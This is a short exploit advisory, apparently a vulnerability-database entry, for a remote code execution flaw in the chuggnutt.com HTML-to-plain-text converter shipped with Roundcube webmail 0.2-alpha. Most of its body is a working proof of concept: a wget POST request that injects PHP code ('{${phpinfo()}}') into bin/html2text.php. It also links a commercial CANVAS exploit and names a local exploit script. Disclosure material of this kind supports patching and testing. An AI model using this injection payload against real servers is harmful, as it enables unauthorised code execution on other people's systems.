chuggnutt.com HTML to Plain Text Conversion Remote Code Execution Vulnerability

chuggnutt.com HTML to Plain Text Conversion Remote Code Execution Vulnerability

Attackers can exploit this issue via a browser.

The following proof of concept is available:

wget -q --header="Content-Type: ''" -O - --post-data='<b>{${phpinfo()}}</b>' --no-check-certificate http://www.example.com/roundcubemail-0.2-alpha/bin/html2text.php

The following commercial exploit is available for Immunity CANVAS:

https://www.immunityinc.com/downloads/immpartners/roundcube.tar.gz

The following exploit is available:

/data/vulnerabilities/exploits/32799.sh